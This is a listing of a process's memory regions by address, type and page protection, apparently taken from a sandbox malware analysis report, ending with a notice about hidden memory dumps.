2D7F000
heap
page read and write
826000
heap
page read and write
559F000
stack
page read and write
84E0000
trusted library allocation
page read and write
821D000
stack
page read and write
6809000
trusted library allocation
page read and write
8E21000
trusted library allocation
page read and write
830000
trusted library section
page read and write
8337000
heap
page read and write
541F000
stack
page read and write
70B0000
trusted library allocation
page read and write
82A7000
trusted library allocation
page read and write
4D8E000
trusted library allocation
page read and write
8570000
trusted library allocation
page execute and read and write
7540000
trusted library allocation
page read and write
4D80000
heap
page read and write
680F000
trusted library allocation
page read and write
8170000
heap
page read and write
85A000
stack
page read and write
2DD2000
heap
page read and write
2C10000
trusted library allocation
page read and write
76BD000
stack
page read and write
76C0000
trusted library allocation
page read and write
484A000
heap
page read and write
4B8D000
stack
page read and write
4DD5000
trusted library allocation
page read and write
73A7000
heap
page read and write
957000
stack
page read and write
6690000
trusted library allocation
page execute
62E1000
heap
page read and write
4D4C000
stack
page read and write
77B0000
trusted library allocation
page read and write
8580000
trusted library allocation
page read and write
4CF0000
heap
page execute and read and write
A2A000
heap
page read and write
63E7000
heap
page read and write
8552000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
4BA0000
heap
page read and write
67F9000
trusted library allocation
page read and write
2D73000
heap
page read and write
6854000
trusted library allocation
page execute
629E000
heap
page read and write
2D38000
heap
page read and write
66BF000
heap
page read and write
56F5000
heap
page read and write
2DC1000
heap
page read and write
57CD000
heap
page read and write
5225000
heap
page read and write
6852000
trusted library allocation
page execute
2C90000
heap
page read and write
549C000
stack
page read and write
A30000
heap
page read and write
5763000
heap
page read and write
5237000
heap
page read and write
4CA0000
trusted library allocation
page read and write
710D000
stack
page read and write
4650000
heap
page read and write
67FF000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
2DEF000
stack
page read and write
7070000
trusted library allocation
page read and write
75D0000
trusted library allocation
page read and write
84C0000
trusted library allocation
page execute and read and write
734A000
heap
page read and write
56FC000
heap
page read and write
5241000
heap
page read and write
52C3000
heap
page read and write
2D7D000
heap
page read and write
7373000
heap
page read and write
2DA6000
heap
page read and write
6801000
trusted library allocation
page read and write
7470000
trusted library allocation
page read and write
56FF000
heap
page read and write
8230000
trusted library allocation
page read and write
6261000
heap
page read and write
757E000
stack
page read and write
2BEA000
heap
page read and write
2DBE000
heap
page read and write
29CD000
heap
page read and write
73B0000
trusted library allocation
page read and write
6846000
trusted library allocation
page read and write
72DD000
heap
page read and write
464D000
stack
page read and write
4B90000
trusted library allocation
page execute and read and write
67FC000
trusted library allocation
page read and write
82E0000
heap
page read and write
57A0000
heap
page read and write
6314000
heap
page read and write
4DC1000
trusted library allocation
page read and write
467C000
stack
page read and write
7620000
trusted library allocation
page read and write
544A000
trusted library allocation
page read and write
4B43000
heap
page read and write
5273000
heap
page read and write
2D74000
heap
page read and write
82AB000
trusted library allocation
page read and write
5779000
heap
page read and write
506A000
trusted library allocation
page read and write
2CE0000
heap
page read and write
680E000
trusted library allocation
page read and write
5443000
trusted library allocation
page read and write
2CAA000
heap
page read and write
2D90000
heap
page read and write
5779000
heap
page read and write
5440000
trusted library allocation
page read and write
575F000
heap
page read and write
5E2C000
trusted library allocation
page read and write
2C30000
trusted library allocation
page read and write
530F000
trusted library allocation
page read and write
6896000
heap
page read and write
6AA3000
heap
page read and write
69B1000
trusted library allocation
page read and write
2DF2000
heap
page read and write
7F620000
trusted library allocation
page execute and read and write
4CB0000
trusted library allocation
page read and write
73F2000
heap
page read and write
6E4E000
stack
page read and write
7410000
heap
page execute and read and write
829E000
stack
page read and write
629F000
heap
page read and write
45FE000
stack
page read and write
73E0000
trusted library allocation
page read and write
2C23000
heap
page read and write
57BD000
heap
page read and write
7580000
trusted library allocation
page read and write
7358000
heap
page read and write
809D000
stack
page read and write
2BDC000
heap
page read and write
63E6000
heap
page read and write
29F0000
trusted library allocation
page read and write
4B9F000
stack
page read and write
B1EE000
trusted library allocation
page read and write
7550000
trusted library allocation
page execute and read and write
4840000
heap
page read and write
5DB9000
trusted library allocation
page read and write
8760000
trusted library section
page read and write
4D0E000
stack
page read and write
73E0000
trusted library allocation
page read and write
84D0000
trusted library allocation
page execute and read and write
C0D000
stack
page read and write
A35000
heap
page read and write
6AB2000
heap
page read and write
45C0000
trusted library allocation
page read and write
4A20000
trusted library allocation
page read and write
52B5000
heap
page read and write
6803000
trusted library allocation
page read and write
4700000
trusted library allocation
page read and write
51E0000
heap
page read and write
2DDC000
heap
page read and write
2B8D000
stack
page read and write
8550000
trusted library allocation
page read and write
832F000
heap
page read and write
2E2B000
heap
page read and write
4D7E000
stack
page read and write
4BC0000
heap
page read and write
2A20000
heap
page read and write
7345000
heap
page read and write
5776000
heap
page read and write
46C9000
trusted library allocation
page read and write
5DA0000
trusted library allocation
page read and write
2E10000
heap
page read and write
2ECF000
stack
page read and write
29A0000
heap
page read and write
7090000
trusted library allocation
page read and write
4A30000
heap
page execute and read and write
5837000
trusted library allocation
page read and write
4A10000
heap
page read and write
46E2000
trusted library allocation
page read and write
2CA1000
heap
page read and write
29E0000
trusted library section
page read and write
8500000
trusted library allocation
page read and write
7780000
trusted library allocation
page read and write
4E06000
trusted library allocation
page read and write
698A000
heap
page read and write
2DA2000
heap
page read and write
73D0D000
unkown
page read and write
62E1000
heap
page read and write
46B4000
trusted library allocation
page read and write
67FB000
trusted library allocation
page read and write
4670000
heap
page read and write
67D0000
trusted library allocation
page read and write
680B000
trusted library allocation
page read and write
691000
remote allocation
page execute read
A26000
heap
page read and write
8C0C000
stack
page read and write
76F0000
trusted library allocation
page read and write
6850000
trusted library allocation
page execute
DE21000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
2C71000
heap
page read and write
8110000
trusted library allocation
page read and write
7287000
trusted library allocation
page read and write
2D70000
heap
page read and write
58D0000
trusted library allocation
page read and write
2C22000
trusted library allocation
page read and write
575E000
heap
page read and write
2D7D000
heap
page read and write
51E1000
heap
page read and write
8B0B000
stack
page read and write
2DBD000
heap
page read and write
52C1000
heap
page read and write
8206000
trusted library allocation
page read and write
6ABF000
heap
page read and write
8520000
trusted library allocation
page read and write
7590000
trusted library allocation
page read and write
70C0000
trusted library allocation
page read and write
73C3000
heap
page read and write
820000
heap
page read and write
8590000
trusted library allocation
page execute and read and write
4BFE000
stack
page read and write
75C0000
trusted library allocation
page read and write
2E00000
trusted library allocation
page read and write
6853000
trusted library allocation
page execute
2C69000
heap
page read and write
629F000
heap
page read and write
4C3F000
stack
page read and write
708A000
stack
page read and write
5068000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
56FF000
heap
page read and write
2D0E000
stack
page read and write
73D0F000
unkown
page readonly
85A0000
trusted library allocation
page execute and read and write
7F0000
heap
page read and write
6F80000
heap
page execute and read and write
2DBE000
heap
page read and write
8129000
trusted library allocation
page read and write
8190000
trusted library allocation
page execute and read and write
2E33000
heap
page read and write
2C32000
trusted library allocation
page read and write
6E5C000
stack
page read and write
2C35000
trusted library allocation
page execute and read and write
74BE000
stack
page read and write
2990000
heap
page read and write
8240000
trusted library allocation
page execute and read and write
698A000
heap
page read and write
5420000
heap
page read and write
2C9D000
heap
page read and write
6ABF000
heap
page read and write
2DCD000
heap
page read and write
4D91000
trusted library allocation
page read and write
8510000
trusted library allocation
page read and write
A20000
heap
page read and write
67F1000
trusted library allocation
page read and write
57AF000
heap
page read and write
67F9000
trusted library allocation
page read and write
85B0000
trusted library section
page read and write
8120000
trusted library allocation
page read and write
2C81000
heap
page read and write
29BC000
stack
page read and write
52BB000
heap
page read and write
B1CE000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
4BCF000
stack
page read and write
8010000
trusted library allocation
page execute and read and write
6EE0000
trusted library allocation
page read and write
5DC1000
trusted library allocation
page read and write
67A000
stack
page read and write
459E000
stack
page read and write
B1AC000
trusted library allocation
page read and write
29C0000
heap
page read and write
6A70000
heap
page read and write
2C00000
trusted library allocation
page read and write
6355000
heap
page read and write
4B0E000
stack
page read and write
73F0000
heap
page read and write
2E24000
heap
page read and write
2C60000
heap
page readonly
7EE000
stack
page read and write
700E000
stack
page read and write
47FC000
stack
page read and write
718B000
stack
page read and write
63A4000
heap
page read and write
7373000
heap
page read and write
5A6A000
trusted library allocation
page read and write
63B000
stack
page read and write
629E000
heap
page read and write
4A1F000
heap
page read and write
75BE000
stack
page read and write
2DBB000
heap
page read and write
2C04000
trusted library allocation
page read and write
2E20000
heap
page read and write
72FE000
stack
page read and write
56EE000
stack
page read and write
5487000
trusted library allocation
page read and write
5055000
trusted library allocation
page read and write
767E000
stack
page read and write
81A0000
trusted library allocation
page read and write
680C000
trusted library allocation
page read and write
56FF000
heap
page read and write
84FE000
trusted library allocation
page read and write
2E29000
heap
page read and write
8560000
trusted library allocation
page execute and read and write
6362000
heap
page read and write
8855000
trusted library allocation
page read and write
75E0000
trusted library allocation
page read and write
2C50000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
5779000
heap
page read and write
82A0000
trusted library allocation
page read and write
C5EE000
trusted library allocation
page read and write
5382000
heap
page read and write
6805000
trusted library allocation
page read and write
29B0000
heap
page read and write
6804000
trusted library allocation
page read and write
80DE000
stack
page read and write
2DBB000
heap
page read and write
2CBE000
heap
page read and write
2DF0000
trusted library allocation
page read and write
67F9000
trusted library allocation
page read and write
4620000
trusted library allocation
page read and write
6355000
heap
page read and write
There are 669 hidden memdumps, click here to show them.